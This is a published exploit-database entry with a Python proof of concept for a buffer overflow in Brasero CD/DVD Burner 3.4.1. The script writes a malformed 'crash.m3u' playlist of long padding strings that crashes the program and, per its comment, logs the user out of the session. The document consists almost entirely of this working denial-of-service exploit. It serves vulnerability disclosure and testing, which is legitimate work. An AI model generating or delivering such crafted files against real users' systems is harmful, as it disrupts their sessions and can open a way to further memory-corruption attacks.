Brasero CD/DVD Burner 3.4.1 - '.m3u' Buffer Overflow Crash (PoC)

Author: Avinash Thapa
type: dos
platform: linux
port: 
date_added: 2015-03-16 
date_updated: 2017-04-01 
verified: 1 
codes: OSVDB-119628 
tags: 
aliases:  
screenshot_url:  
application_url: 

#!/usr/bin/python

#Exploit title: Brasero 3.4.1 'm3u' Buffer Overflow POC
#Date Discovered: 15th March' 2015
# Exploit Author: Avinash Kumar Thapa "-Acid"
# Vulnerable Software: Brasero 3.4.1 CD/DVD for the Gnome Desktop
# Homepage:https://wiki.gnome.org/Apps/Brasero
# Tested on: Kali Linux 1.0.9

buffer ="A"*26109

buffer += "CCCC"

buffer += "D"*10500

file = "crash.m3u"

f = open(file, "w")

f.write(buffer)

f.close()

# After running exploit, run malicious file with brasero CD/DVD burner and check the crash which leads to logged out from your current session.
#####################################################################
# -Acid                                                             #
#####################################################################